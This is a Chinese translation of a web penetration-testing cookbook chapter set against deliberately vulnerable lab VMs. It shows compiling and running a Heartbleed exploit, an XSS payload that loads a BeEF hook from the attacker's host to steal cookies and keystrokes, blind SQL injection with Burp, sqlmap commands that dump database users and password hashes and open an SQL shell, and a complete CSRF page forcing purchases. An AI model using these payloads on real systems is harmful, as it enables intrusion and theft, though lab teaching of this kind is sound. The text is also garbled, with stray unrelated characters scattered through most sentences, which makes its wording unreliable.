第七章 高級(jí)利用

作者:Gilberto Najera-Gutierrez
譯者:飛龍
協(xié)議:CC BY-NC-SA 4.0

簡(jiǎn)介

在獲得一些便利來(lái)發(fā)現(xiàn)和利用漏洞之后,我們現(xiàn)在轉(zhuǎn)向可能需要更多努力的其他問(wèn)題上虾啦。

這一章中当凡,我們會(huì)搜索利用殖告,編譯程序言疗,建立服務(wù)器以及破解密碼,這可以讓我們?cè)L問(wèn)敏感信息宝泵,并執(zhí)行服務(wù)器和應(yīng)用中的特權(quán)功能好啰。

7.1 在 Exploit-DB 中搜索 Web 服務(wù)器的漏洞

我們偶爾會(huì)在操作系統(tǒng)中, Web 應(yīng)用所使用的庫(kù)中儿奶,以及活動(dòng)服務(wù)中發(fā)現(xiàn)服務(wù)器漏洞框往,或者可以在瀏覽器或 Web 代理中不能利用的安全問(wèn)題。對(duì)于這些情況闯捎,我們可以使用 Metasploit 的利用集合椰弊,或者如果我們要找的不在 Metasploit 里面,我們可以在 Exploit-DB 中搜索它瓤鼻。

Kali 包含了 Exploit-DB 中的利用的離線副本秉版。這個(gè)秘籍中,我們會(huì)使用 Kali 自帶的命令來(lái)探索這個(gè)數(shù)據(jù)庫(kù)并找到我們需要的利用茬祷。

操作步驟

  • 1.打開(kāi)終端清焕。

  • 2.輸入下列命令:

1  searchsploit heartbleed
  • 3.下一步是將利用復(fù)制到一個(gè)可以修改的地方,并編譯它祭犯,像這樣:
1  mkdir heartbleed 
2  cd heartbleed
3  cp /usr/share/exploitdb/platforms/multiple/remote/32998.c 
  • 4.通常秸妥,利用在第一行包含一些自身信息,以及如何使用它們沃粗,像這樣:
1  head -n 30 32998.c
  • 5.這里粥惧,利用使用 C 編寫(xiě),所以我們需要將它編譯來(lái)使用最盅。編譯命令在文件中顯示(cc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed)突雪,它在 Kali 中不起作用,所以我們需要下面這個(gè):
1  gcc 32998.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto

工作原理

searchsploit命令是安裝在 Kali 中的 Exploit-DB 本地副本的接口涡贱。它用于在利用的標(biāo)題和描述中搜索字符串咏删,并顯示結(jié)果。

利用存在于/usr/share/exploitdb/platforms目錄中问词。searchsploit所展示的利用目錄是它的相對(duì)路徑饵婆,這就是我們?cè)趶?fù)制文件的時(shí)候使用完整路徑的原因。利用文件以利用編號(hào)命名戏售,在它們被提交到Exploit-DB 時(shí)分配侨核。

編譯步驟和在源代碼中的推薦有些不同,因?yàn)?OpenSSL 庫(kù)在基于 Debian 的發(fā)行版中灌灾,由于它們從源代碼中構(gòu)建的方式而缺少一些功能搓译。

更多

監(jiān)控利用的影響和效果極其重要,因?yàn)槲覀冊(cè)趯?shí)時(shí)系統(tǒng)中使用它锋喜。通常些己,Exploit-DB 中的利用都值得相信豌鸡,即使它們通常需要一些調(diào)整來(lái)工作在特定的環(huán)境中,但是它們中有一些不像他們所說(shuō)的那樣段标。出于這個(gè)原因涯冠,在真實(shí)世界的滲透測(cè)試中使用之前,我們需要檢查源代碼并在我們的實(shí)驗(yàn)環(huán)境中測(cè)試它們逼庞。

另見(jiàn)

除了 Exploit-DB(www.exploit-db.com)蛇更,也有一些其他站點(diǎn)可以用于搜索目標(biāo)系統(tǒng)中的已知漏洞和利用:

7.2 利用 Heartbleed 漏洞

這個(gè)秘籍中,我們會(huì)使用之前編譯的 Heartbleed 利用來(lái)提取關(guān)于存在漏洞的 Bee-box 服務(wù)器的信息(https://192.168.56.103:8443/)赛糟。

Bee-box 虛擬機(jī)可以從https://www.vulnhub.com/ entry/bwapp-bee-box-v16,53/下載派任,那里也有安裝指南。

準(zhǔn)備

在上一個(gè)秘籍中璧南,我們生成了 Heartbleed 利用的可執(zhí)行文件掌逛。我們現(xiàn)在使用它來(lái)利用服務(wù)器的漏洞。

Heartbleed 是能夠從服務(wù)器內(nèi)存中提取信息的漏洞司倚。在嘗試?yán)脕?lái)獲得一些要提取的信息之前豆混,可能需要瀏覽并向服務(wù)器的 8443 端口上的 HTTPS 頁(yè)面發(fā)送數(shù)據(jù)。

操作步驟

  • 1.如果我們檢查Bee-Box 的 8443 端口动知,我們會(huì)發(fā)現(xiàn)它存在 Heartbleed 漏洞皿伺。
1  sslscan 192.168.56.103:8443
  • 2.現(xiàn)在,讓我們開(kāi)始利用漏洞拍柒。手心,我們?cè)L問(wèn)包含可執(zhí)行利用的文件夾:
1  cd heartbleed
  • 3.之后我們檢查程序的選項(xiàng)屈暗,像這樣:
1  ./heartbleed --help
  • 4.我們要嘗試?yán)?code>192.168.56.103的 443 端口拆讯,獲得最大的泄露并保存輸出到文本文件hb_test.txt
1  ./heartbleed -s 192.168.56.103 -p 8443 -f hb_test.txt -t 1
  • 5.現(xiàn)在养叛,如果我們檢查hb_test.txt的內(nèi)容:
1  cat hb_test.txt

我們的利用從 HTTPS 服務(wù)器中提取了信息种呐,從這里我們可以看到會(huì)話 OD 甚至還有完整的登錄請(qǐng)求,包括純文本用戶名和密碼弃甥。

  • 6.如果我們想要跳過(guò)所有的二進(jìn)制數(shù)據(jù)爽室,只查看文件中的可讀文本,使用strings
    命令:
1  strings hb_test.txt

工作原理

我們?cè)诘谒恼轮刑岬竭^(guò)淆攻,Heartbleed 漏洞允許攻擊者從 OpenSSL 服務(wù)器內(nèi)存中以純文本讀取信息阔墩,這意味著我們不需要解密甚至是解釋任何客戶端和服務(wù)端之間的通信,我們只需簡(jiǎn)單地向服務(wù)器請(qǐng)求內(nèi)存中的東西瓶珊,它會(huì)回應(yīng)未加密的信息啸箫。

這個(gè)秘籍中,我們使用了可公共訪問(wèn)的利用來(lái)執(zhí)行攻擊伞芹,并獲取到至少一個(gè)有效的會(huì)話 ID忘苛。有的時(shí)候還可能在 Heartbleed 的轉(zhuǎn)儲(chǔ)中找到密碼或其它敏感信息蝉娜。

最后,strings命令只展示文件中的字符串扎唾,跳過(guò)所有特殊字符召川,使其更加易讀。

7.3 使用 BeEF 利用 XSS

BeEF胸遇,即瀏覽器利用框架荧呐,是個(gè)專注于客戶端攻擊向量的框架,特別是 Web 瀏覽器的攻擊狐榔。

這個(gè)秘籍中坛增,我們會(huì)利用 XSS 漏洞并使用 BeEF 來(lái)控制客戶端瀏覽器。

準(zhǔn)備

在開(kāi)始之前薄腻,我們需要確保啟動(dòng)了 BeEF 服務(wù)收捣,并且能夠訪問(wèn)http://127.0.0.1:3000/ui/panel(使用beef/beef身份標(biāo)識(shí))。

  • 1.Kali 的默認(rèn) BeEF 服務(wù)不能工作庵楷。所以我們不能僅僅運(yùn)行beef-xss讓它啟動(dòng)罢艾。我們需要從安裝目錄中啟動(dòng)它,像這樣:
cd /usr/share/beef-xss/ ./beef
  • 2.現(xiàn)在尽纽,瀏覽http://127.0.0.1:3000/ui/panel并使用beef作為用戶名和密碼咐蚯。如果有效,我們就準(zhǔn)備好了弄贿。

操作步驟

  • 1.BeEF 需要客戶端瀏覽器調(diào)用hook.js文件春锋,這用于將瀏覽器勾到我們的 BeEF 服務(wù)器,我們會(huì)使用一個(gè)存在 XSS 漏洞的應(yīng)用來(lái)使用戶調(diào)用它差凹。為了嘗試簡(jiǎn)單的 XSS 測(cè)試期奔,瀏覽http://192.168.56.102/bodgeit/search.jsp?q=%3Cscript%3Ealert%28 1%29%3C%2Fscript%3E

  • 2.這就是存在 XSS 漏洞的應(yīng)用危尿,所以現(xiàn)在我們需要修改腳本來(lái)調(diào)用hook.js呐萌。想象一下你就是受害者,你已經(jīng)收到了包含http://192.168.56.102/bodgeit/search.jsp?q=<script src="http://192.168.56.1:3000/hook.js"></script>鏈接的郵件谊娇,你打算瀏覽器它來(lái)看看肺孤,像這樣:

  • 3.現(xiàn)在,在 BeEF 面板中济欢,攻擊者會(huì)看到新的在線瀏覽器赠堵。

  • 4.攻擊者的最佳步驟就是生成一些持久的,至少在用戶瀏覽期間有效法褥。訪問(wèn)攻擊者瀏覽器的Command標(biāo)簽頁(yè)顾腊,從這里選擇Persistence | Man-In-The-Browser之后點(diǎn)擊Execute。執(zhí)行之后挖胃,選擇Module Results History中的相關(guān)命令來(lái)檢查結(jié)果杂靶,像這樣:

  • 5.如果我們檢查瀏覽器中的Logs標(biāo)簽頁(yè)梆惯,我們可能會(huì)看到BeEF正在儲(chǔ)存用戶關(guān)于用戶在瀏覽器中執(zhí)行什么操作的信息,例如輸入和點(diǎn)擊吗垮,我們可以在這里看到:

  • 6.我們也可以通過(guò)使用Commands | Browser | Hooked Domain | Get Cookie來(lái)獲取Cookie垛吗,像這樣:

工作原理

這個(gè)秘籍中,我們使用了script標(biāo)簽的src屬性來(lái)調(diào)用外部 JS 文件烁登,這里是 BeEF的鉤子怯屉。

hook.js文件與服務(wù)器通信,執(zhí)行命令并返回響應(yīng)饵沧,使攻擊者能夠看到它們锨络。它在客戶端的瀏覽器中不打印任何東西,所以受害者通常不會(huì)知道他的瀏覽器正在被攻擊狼牺。

在讓受害者執(zhí)行我們的hook腳本之后羡儿,我們使用持久化模塊 Man In The Browser 使瀏覽器在每次用戶點(diǎn)擊鏈接時(shí),向相同域發(fā)送 AJAX 請(qǐng)求是钥,所以這個(gè)請(qǐng)求維持了鉤子掠归,也加載了新的頁(yè)面。

我么也會(huì)看到悄泥,BeEF 的日志記錄了用戶在頁(yè)面上執(zhí)行的每個(gè)步驟虏冻,我們能夠從中獲得用戶名和密碼信息。也可以用來(lái)獲得遠(yuǎn)程的會(huì)話 Cookie弹囚,這可以讓攻擊者劫持受害者的會(huì)話厨相。

更多

BeEF 擁有很多功能,從判斷受害者所使用的瀏覽器類型鸥鹉,到利用已知漏洞和完全攻陷客戶端系統(tǒng)蛮穿。一些有趣的特性是:

  • Social Engineering/Pretty Theft:這是個(gè)社會(huì)工程工具,允許我們模擬登陸頁(yè)面宋舷,就像常見(jiàn)的服務(wù)那樣绪撵,例如 Fackbook瓢姻、Linkedin祝蝠、YouTube 以及其它。

  • Browser/Webcam and Browser/Webcam HTML5:就像看上去那樣幻碱,這兩個(gè)模塊能夠惡意使用許可配置來(lái)激活受害者的攝像頭绎狭,前者使用隱藏的 Flash embed標(biāo)簽,后者使用 HTML5 標(biāo)簽褥傍。

  • Exploits folder:這包含一組特殊軟件和情況的利用儡嘶,它們中的一些利用服務(wù)和其它客戶端瀏覽器。

  • Browser/Hooked Domain/Get Stored Credentials:這會(huì)嘗試提取瀏覽器中儲(chǔ)存的淪陷域的用戶名和密碼恍风。

  • Use as Proxy:如果我們右擊被勾住的瀏覽器蹦狂,我們會(huì)獲得將其用作代理的選項(xiàng)誓篱。這將客戶端瀏覽器用作代理,會(huì)給我們機(jī)會(huì)來(lái)探索受害者的內(nèi)部網(wǎng)絡(luò)凯楔。

BeEF 有許多其它攻擊和模塊,對(duì)滲透測(cè)試者非常實(shí)用,如果你想要了解更多逛拱,你可以查看官方的 Wiki:https://github.com/ beefproject/beef/wiki诗良。

7.4 利用 SQL 盲注

在第六章中,我們利用了基于錯(cuò)誤的 SQL 注入虐骑,現(xiàn)在我們使用 Burp Suite Intruder 作為主要工具來(lái)識(shí)別和利用 SQL 盲注准验。

準(zhǔn)備

使瀏覽器將 Burp Suite 用作代理。

操作步驟

  • 1.瀏覽http://192.168.56.102/WebGoat廷没,實(shí)用webgoat作為用戶名和密碼登錄糊饱。

  • 2.點(diǎn)擊Start WebGoat來(lái)訪問(wèn) WebGoat 的主頁(yè)。

  • 3.訪問(wèn)Injection Flaws | Blind Numeric SQL Injection腕柜。

  • 4.頁(yè)面上說(shuō)济似,練習(xí)的目標(biāo)是找到給定字段在給定行中的值。我們的做事方式有一點(diǎn)不同盏缤,但是讓我們看看它如何工作:將101作為賬戶號(hào)碼砰蠢,并點(diǎn)擊go

  • 5.現(xiàn)在嘗試1011唉铜。


    到目前為止台舱,我們看到了應(yīng)用的行為,它僅僅告訴我們賬戶號(hào)碼是否有效潭流。

  • 6.讓我們嘗試注入竞惋,因?yàn)樗檎姨?hào)碼,可能將它們用作整數(shù)灰嫉。我們?cè)跍y(cè)試中不使用單引號(hào)拆宛,所以提交101 and 1=1
    `

  • 7.現(xiàn)在嘗試101 and 1=2讼撒。


    看上去這里有個(gè)盲注浑厚,在有效的賬戶中注入恒真的條件結(jié)果。注入恒假的條件時(shí)會(huì)出現(xiàn)Invalid account number信息根盒。

  • 8.在這個(gè)秘籍中钳幅,我們要獲得連接到數(shù)據(jù)庫(kù)的用戶名稱。所以我們首先需要知道用戶名稱的長(zhǎng)度炎滞。讓我們嘗試一下敢艰,注入101 AND 1=char_length(current_user)

  • 9.下一步是在 BurpSuite 的代理中尋找最后一個(gè)請(qǐng)求册赛,并將它發(fā)送到 intruder中钠导,像這樣:


  • 10.一旦發(fā)送到 intruder震嫉,我們可以清楚所有載荷標(biāo)記,并在AND后面的1中添加新的牡属,像這樣:

  • 11.訪問(wèn)載荷部分并將Payload type設(shè)為Numbers责掏。

  • 12.將Payload type設(shè)為Sequential,從 1 到 15湃望,步長(zhǎng)為 1换衬。

  • 13.為了看看響應(yīng)是否滿足要求,訪問(wèn)Intruder's options证芭,清除GrepMatch列表并添加Invalid account number瞳浦,以及Account number is valid


    我們需要在每個(gè) intruder 的標(biāo)簽頁(yè)中這樣修改废士。

  • 14.為了使應(yīng)用自動(dòng)化叫潦,在Redirections中選擇Always,并在Redirections中選擇Process cookies官硝。


    我們需要在每個(gè) intruder 的標(biāo)簽頁(yè)中這樣修改矗蕊。

  • 15.開(kāi)始攻擊



    它找到了號(hào)碼為 2 的有效響應(yīng),這意味著用戶名只含有兩個(gè)字符長(zhǎng)氢架。

  • 16.現(xiàn)在傻咖,我們打算猜測(cè)用戶名的每個(gè)字符,從第一個(gè)字符開(kāi)始岖研。在應(yīng)用中提交下列代碼:101 AND 1=(current_user LIKE 'b%')卿操。
    我們選擇b作為第一個(gè)字符,讓 BurpSuite 來(lái)獲取請(qǐng)求孙援,它應(yīng)該為任意字符害淤。

  • 17.同樣,我們將請(qǐng)求發(fā)送給 intruder 并保留唯一的載荷標(biāo)記b
    拓售,它是名稱的首單詞窥摄。


  • 18.我們的載荷應(yīng)該是含有所有小寫(xiě)字母和大寫(xiě)字母的列表(從 a 到 z 以及 A 到 Z)。


  • 19.在 intruder 中重復(fù)步驟 13 到 14 并開(kāi)始攻擊础淤,像這樣:


    我們的用戶名的首字母是S崭放。

  • 20.現(xiàn)在,我們需要找到名稱的第二個(gè)單詞值骇,所以我們提交101 AND 1=(current_user='Sa')到應(yīng)用的文本框莹菱,并發(fā)送請(qǐng)求給 intruder移国。

  • 21.現(xiàn)在我們的載荷標(biāo)記是S后面的a吱瘩,換句話說(shuō),名稱的第二個(gè)字符迹缀。

  • 22.重復(fù)步驟 18 到 19使碾。在我們的例子中蜜徽,我們只使用了倆表中的大寫(xiě)字母,因?yàn)槿绻谝粋€(gè)單詞是大寫(xiě)的票摇,兩個(gè)單詞就很可能都是大寫(xiě)的拘鞋。


    名稱的第二個(gè)單詞是A,所以應(yīng)用用于執(zhí)行查詢的數(shù)據(jù)庫(kù)用戶是SA矢门。SA在 MSSQL 數(shù)據(jù)庫(kù)中的意思是系統(tǒng)管理員盆色。

工作原理

利用 SQL 盲注比起基于錯(cuò)誤的注入花費(fèi)更多精力和時(shí)間。在這個(gè)秘籍中我們看到了如何獲取連接到數(shù)據(jù)庫(kù)的用戶名祟剔,而在第六章的 SQL 注入利用匯總隔躲,我們使用了一條命令來(lái)獲取它。

我們可以使用字典來(lái)查看當(dāng)前用戶是否在名稱列表中物延,但是如果名稱不在列表中宣旱,會(huì)花費(fèi)更多時(shí)間。

我們最開(kāi)始識(shí)別了漏洞叛薯,所顯示的信息告訴我們我們的請(qǐng)求是真是假浑吟。

一旦我們知道存在注入,并且正面的響應(yīng)是什么樣子耗溜,我們開(kāi)始詢問(wèn)當(dāng)前用戶的長(zhǎng)度组力,詢問(wèn)數(shù)據(jù)庫(kù),1是否是當(dāng)前用戶名的長(zhǎng)度抖拴,是不是2忿项,以此類推,知道我們發(fā)現(xiàn)了長(zhǎng)度城舞。知道何時(shí)停止用戶名長(zhǎng)度的搜索非常重要轩触。

在找到長(zhǎng)度之后,我們使用相同的技巧來(lái)發(fā)現(xiàn)首字母家夺,LIKE 'b%'語(yǔ)句告訴 SQL 解釋器是否首字母是b脱柱,剩下的并不重要,它可以是任何東西(%是用于多數(shù) SQL 實(shí)現(xiàn)的通配符)拉馋。這里榨为,我們看到了首字母是S。使用相同的技巧煌茴,我們就能發(fā)現(xiàn)第二個(gè)字符随闺,并得到整個(gè)名稱。

更多

這個(gè)攻擊可以繼續(xù)來(lái)獲得 DBMS 的版本蔓腐,之后使用廠商特定的命令來(lái)觀察是否用戶擁有管理權(quán)限矩乐。如果是的話,你可以提取所有用戶名和密碼,激活遠(yuǎn)程連接散罕,以及除此之外的許多事情分歇。

你可以嘗試的事情之一就是使用 SQLMap 來(lái)利用這類型的注入。

還有另一種類型的盲注欧漱,它是基于時(shí)間的 SQL 盲注职抡。其中我們沒(méi)有可視化的線索,關(guān)于命令是否被執(zhí)行(就像有效或者無(wú)效的賬戶信息)误甚。反之缚甩,我們需要給數(shù)據(jù)庫(kù)發(fā)送sleep命令,如果響應(yīng)時(shí)間鯧魚(yú)我們發(fā)送的時(shí)間窑邦,那么它就是真的響應(yīng)蹄胰。這類型的攻擊非常緩慢,因?yàn)樗袝r(shí)需要等待 30 秒來(lái)獲得僅僅一個(gè)字符奕翔。擁有類似 sqlninja 或者 SQLMap 的工具在這種情況下十分有用(https://www.owasp.org/index.php/Blind_SQL_Injection)裕寨。

7.5 使用 SQLMap 獲得數(shù)據(jù)庫(kù)信息

在第六章中,我們使用了 SQLMap 來(lái)從數(shù)據(jù)庫(kù)提取信息和表的內(nèi)容派继。這非常實(shí)用宾袜,但是這不僅僅是這個(gè)工具的優(yōu)勢(shì),也不是最有趣的事情驾窟。這個(gè)秘籍中庆猫,我們會(huì)將其用于提取關(guān)于數(shù)據(jù)庫(kù)用戶和密碼的信息,這可以讓我們?cè)L問(wèn)整個(gè)系統(tǒng)绅络,而不僅僅是應(yīng)用月培。

操作步驟

  • 1.啟動(dòng) Bee-box 虛擬機(jī)之后,將 BurpSuite 監(jiān)聽(tīng)用做代理恩急,登錄和選擇 SQL 注入漏洞(POST/Search)杉畜。

  • 2.輸入任何電影名稱并點(diǎn)擊Search

  • 3.現(xiàn)在讓我們?cè)L問(wèn) BuirpSuite 并查看請(qǐng)求:


  • 4.現(xiàn)在衷恭,在 Kali 中訪問(wèn)終端并輸入以下命令:

1  sqlmap -u "http://192.168.56.103/bWAPP/sqli_6.php" --cookie="PHPS ESSID=15bfb5b6a982d4c86ee9096adcfdb2e0; security_level=0" --data "title=test&action=search" -p title --is-dba

我們可以看到注入成功了此叠。當(dāng)前的用戶是 DBA,這意味著用戶可以對(duì)數(shù)據(jù)庫(kù)執(zhí)行管理員操作随珠,例如添加用戶和修改密碼灭袁。

  • 5.現(xiàn)在我們打算提取更多信息,例如用戶和密碼窗看,所以在終端中輸入以下命令:
1  sqlmap -u "http://192.168.56.103/bWAPP/sqli_6.php" --cookie="PHPS ESSID=15bfb5b6a982d4c86ee9096adcfdb2e0; security_level=0" --data "title=test&action=search" -p title --is-dba --users --passwords

我們現(xiàn)在得到了數(shù)據(jù)庫(kù)的用戶列表以及哈希后的密碼茸歧。

  • 6.我們也可以獲得 shell,讓我們能夠直接發(fā)送 SQL 查詢到數(shù)據(jù)庫(kù)显沈。
1  sqlmap -u "http://192.168.56.103/bWAPP/sqli_6.php" --cookie="PHPS ESSID=15bfb5b6a982d4c86ee9096adcfdb2e0; security_level=0" --data "title=test&action=search" -p title –sql-shell

工作原理

一旦我們知道了存在 SQL 注入软瞎,我們使用 SQLMap 來(lái)利用它,像這樣:

1  sqlmap -u "http://192.168.56.103/bWAPP/sqli_6.php" --cookie="PHPS ESSID=15bfb5b6a982d4c86ee9096adcfdb2e0; security_level=0" --data "title=test&action=search" -p title --is-dba

在這個(gè)對(duì) SQLMap 的調(diào)動(dòng)中,我們使用了--cookie參數(shù)來(lái)發(fā)送會(huì)話 Cookie 因?yàn)閼?yīng)用需要身份驗(yàn)證來(lái)訪問(wèn)sqli_6.php頁(yè)面铜涉。--data參數(shù)包含發(fā)送到服務(wù)器的 POST 數(shù)據(jù),=p告訴 SQLMap 僅僅注入title參數(shù)遂唧,--is-dba詢問(wèn)數(shù)據(jù)庫(kù)當(dāng)前用戶是否擁有管理員權(quán)限芙代。

DBA 允許我們向數(shù)據(jù)庫(kù)詢問(wèn)其他用戶的信息,SQLMap 通過(guò)--users--passwords使我們的操作變得更加容易盖彭。這些參數(shù)詢問(wèn)用戶名和密碼纹烹,因?yàn)樗?DBMS 將用戶的密碼加密存儲(chǔ),我們獲得的只能是哈希召边。所以我們?nèi)匀灰褂妹艽a破解器來(lái)破解它們铺呵。如果你在 SQLMap 詢問(wèn)你執(zhí)行字典攻擊的時(shí)候回答Yes,你可能就知道了至少一個(gè)用戶的密碼隧熙。

我們也使用了--sql-shell選項(xiàng)來(lái)從我們向數(shù)據(jù)庫(kù)發(fā)送的 SQL 查詢中獲得 shell片挂。這并不是真的 shell,當(dāng)然贞盯,SQLMap 通過(guò) SQL 注入發(fā)送我們寫(xiě)的命令音念,并返回這些查詢的結(jié)果。

7.6 執(zhí)行 CSRF 攻擊

CSRF 攻擊強(qiáng)迫身份驗(yàn)證后的用戶在 Web 應(yīng)用中執(zhí)行需要身份驗(yàn)證的躏敢,非預(yù)期的行為闷愤。這可以通過(guò)用戶所瀏覽的外部站點(diǎn)觸發(fā)該行為來(lái)實(shí)現(xiàn)。

這個(gè)秘籍中件余,我們會(huì)獲取應(yīng)用中的信息讥脐,來(lái)觀察攻擊站點(diǎn)是否能夠發(fā)送有效的請(qǐng)求給漏洞服務(wù)器。之后啼器,我們會(huì)創(chuàng)建頁(yè)面來(lái)模擬正常請(qǐng)求并誘使用戶在身份驗(yàn)證后訪問(wèn)這個(gè)頁(yè)面旬渠。惡意頁(yè)面之后會(huì)發(fā)送請(qǐng)求給漏洞服務(wù)器,如果應(yīng)用在相同瀏覽器中打開(kāi)端壳,它會(huì)執(zhí)行操作坟漱,好像用戶發(fā)送了它們。

準(zhǔn)備

為了執(zhí)行 CSRF 攻擊更哄,我們使用 vulnerable_vm 中的 WackoPicko 應(yīng)用:http://192.168.56.102/WackoPicko芋齿。我們需要兩個(gè)用戶,一個(gè)叫做v_user成翩,是受害者觅捆,另一個(gè)叫做attacker

我們也需要啟動(dòng) BurpSuite 并將其配置為服務(wù)器的代理麻敌。

操作步驟

  • 1.作為attacker登錄 WackoPicko栅炒。

  • 2.攻擊者首先需要了解應(yīng)用的行為,所以如果我們發(fā)酸使用戶購(gòu)買(mǎi)我們的圖片,將 BurpSuite 用作代理赢赊,我們需要瀏覽:http://192.168.56.102/WackoPicko/pictures/recent.php乙漓。

  • 3.選項(xiàng) ID 為 8 的圖片:http://192.168.56.102/WackoPicko/ pictures/view.php?picid=8

  • 4.點(diǎn)擊Add to Cart释移。

  • 5.會(huì)花費(fèi)我們 10 個(gè) Tradebux叭披,但這是值得的,所以點(diǎn)擊Continue to Confirmation玩讳。

  • 6.在下一頁(yè)上涩蜘,點(diǎn)擊Purchase

  • 7.現(xiàn)在熏纯,讓我們?cè)L問(wèn) BurpSuite 來(lái)分析發(fā)生了什么同诫。

第一個(gè)有趣的調(diào)用是/WackoPicko/cart/action. php?action=add&picid=8,它是添加圖片到購(gòu)物車的請(qǐng)求樟澜。/WackoPicko/cart/confirm.php在我們點(diǎn)擊相應(yīng)按鈕時(shí)調(diào)用误窖,它可能必須用于購(gòu)買(mǎi)。另一個(gè)可被攻擊者利用的是購(gòu)買(mǎi)操作的 POST 調(diào)用:/WackoPicko/cart/action. php?action=purchase秩贰,他告訴應(yīng)用將圖片添加到購(gòu)物車中并收相應(yīng)的 Tradebux贩猎。

  • 8.現(xiàn)在,攻擊者需要上傳圖片來(lái)強(qiáng)迫其它用戶購(gòu)買(mǎi)萍膛。登錄為attacker
    之后吭服,訪問(wèn)Upload,填充所需信息蝗罗,選項(xiàng)需要上傳的文件艇棕,點(diǎn)擊UploadFile


    一旦圖片唄上傳串塑,我們會(huì)直接重定向到它的相應(yīng)頁(yè)面沼琉,你可以在這里看到:

    要注意為圖片分配的 ID,它是攻擊的核心部分桩匪,這里它是 16打瘪。

  • 9.一旦我們分析了購(gòu)買(mǎi)流程,并擁有了圖片 ID傻昙,我們需要啟動(dòng)托管惡意頁(yè)面的服務(wù)器闺骚。在 Kali 中以 root 用戶啟動(dòng) Apache 服務(wù)器,像這樣:

service apache2 start 
  • 10.之后妆档,創(chuàng)建 HTML 文件僻爽,叫做/var/www/html/wackopurchase.html
    ,帶有如下內(nèi)容:
1  <html> 
2  <head></head> 
3  <body onLoad='window.location="http://192.168.56.102/ WackoPicko/cart/action.php?action=purchase";setTimeout("window. close;",1000)'> 
4  <h1>Error 404: Not found</h1> 
5  <iframe src="http://192.168.56.102/WackoPicko/cart/action. php?action=add&picid=16"> 
6  <iframe src="http://192.168.56.102/WackoPicko/cart/review.php" > 
7  <iframe src="http://192.168.56.102/WackoPicko/cart/confirm.php">
8  </iframe> 
9  </iframe> 
10 </iframe> 
11 </body>

這個(gè)代碼會(huì)我們的商品的發(fā)送add贾惦、reviewconfirm請(qǐng)求給 WackoPicko 胸梆,之后展示 404 頁(yè)面給用戶敦捧,當(dāng)它加載完成后,它會(huì)重定向到購(gòu)買(mǎi)操作碰镜,之后在一秒后關(guān)閉窗口兢卵。

  • 11.現(xiàn)在以v_user登錄,上傳圖片并登出绪颖。

  • 12.作為攻擊者秽荤,我們需要確保用戶訪問(wèn)我們的惡意站點(diǎn),同時(shí)仍然保持登錄 WackoPicko菠发。以attacker登錄之后王滤,訪問(wèn)Recent并選擇屬于v_user的圖片(剛剛上傳的那個(gè))贺嫂。

  • 13.我們需要在圖片上輸入下列評(píng)論滓鸠。

1  This image looks a lot like <a href="http://192.168.56.1/ wackopurchase.html" target="_blank">this</a>

譯者注:這一步的前提是頁(yè)面上存在 XSS,沒(méi)有的話利用社會(huì)工程直接發(fā)送鏈接也是可行的第喳。

  • 14.點(diǎn)擊Preview之后Create糜俗。


    你可以看到,評(píng)論中允許HTML 代碼曲饱,而且當(dāng)v_user點(diǎn)擊鏈接是悠抹,我們的惡意頁(yè)面會(huì)在新窗口打開(kāi)。

  • 15.登出并以v_user登錄扩淀。

  • 16.訪問(wèn)Home并點(diǎn)擊Your Purchased Pics楔敌,這里應(yīng)該沒(méi)有攻擊者的圖片。

  • 17.再次訪問(wèn)Home驻谆,之后訪問(wèn)Your Uploaded Pics卵凑。

  • 18.選項(xiàng)帶有攻擊者評(píng)論的圖片。

  • 19.點(diǎn)擊評(píng)論中的鏈接胜臊。



    當(dāng)它完全加載之后勺卢,你應(yīng)該看到文本框中的一些 WackoPicko 的文本,這個(gè)窗口會(huì)在一秒之后關(guān)閉象对,我們的攻擊已經(jīng)完成了黑忱。

  • 20.如果我們?cè)L問(wèn)Home,你可以看到v_user的 Tradebux 余額現(xiàn)在是 85勒魔。

  • 21.現(xiàn)在訪問(wèn)Your Purchased Picshttp://192.168.56.102/WackoPicko/ pictures/purchased.php來(lái)查看非預(yù)期購(gòu)買(mǎi)的圖片:

對(duì)于 CSRF 工具者甫煞,成功執(zhí)行漏洞需要預(yù)置條件。首先冠绢,我們需要了解執(zhí)行特殊操作所需的請(qǐng)求參數(shù)危虱,以及我們需要在所有情況中都處理的響應(yīng)。

這個(gè)秘籍中唐全,我們使用了代理和有效用戶賬戶來(lái)執(zhí)行我們所需的操作埃跷,來(lái)復(fù)制和收集所需信息:購(gòu)買(mǎi)過(guò)程中涉及到的請(qǐng)求蕊玷,這些請(qǐng)求所需的信息,以及執(zhí)行它們的正確順序弥雹。

一旦我們知道了需要向應(yīng)用發(fā)送什么垃帅,我們需要將其自動(dòng)化,所以我們啟動(dòng) Web 服務(wù)器剪勿,并準(zhǔn)備頁(yè)面使調(diào)用以正確順序和正確參數(shù)執(zhí)行贸诚。通過(guò)使用 onLoadJS 時(shí)間,我們確保購(gòu)買(mǎi)在addconfirm調(diào)用之前不會(huì)執(zhí)行厕吉。

在每個(gè) CSRF 攻擊中酱固,都必須有方法讓用戶訪問(wèn)我們的惡意站點(diǎn),同時(shí)保持正常站點(diǎn)的登錄头朱。這個(gè)秘籍中运悲,我們使用應(yīng)用的特性,它的評(píng)論允許 HTML 代碼项钮,并可以在這里輸入鏈接班眯。所以當(dāng)用戶點(diǎn)擊某個(gè)圖片評(píng)論中的鏈接時(shí),它就向我們的 Tradebox 盜取站點(diǎn)發(fā)送了請(qǐng)求烁巫。

最后署隘,當(dāng)用戶訪問(wèn)我們的站點(diǎn)時(shí),它模擬了錯(cuò)誤頁(yè)面亚隙,并在購(gòu)買(mǎi)請(qǐng)求剛剛完成后關(guān)閉自己磁餐。在這里我們并不需要擔(dān)心滲透,所以錯(cuò)誤頁(yè)面可以改進(jìn)一下使用戶不懷疑它阿弃。這通過(guò) HTML body標(biāo)簽中的onload事件中的 JavaScript命令(購(gòu)買(mǎi)操作的調(diào)用诊霹,和用于關(guān)閉窗口的計(jì)時(shí)器)來(lái)完成。這個(gè)時(shí)間在頁(yè)面的所有元素完全加載之后觸發(fā)恤浪,換句話說(shuō)畅哑,當(dāng)addreviewconfirm的步驟完成之后水由。

7.7 使用 Shellsock 執(zhí)行命令

Shellshock(也叫作Bashdoor)是個(gè)在 2014 年九月發(fā)現(xiàn)在 Bash shell 中的bug荠呐,允許命令通過(guò)儲(chǔ)存在環(huán)境變量中的函數(shù)來(lái)執(zhí)行。

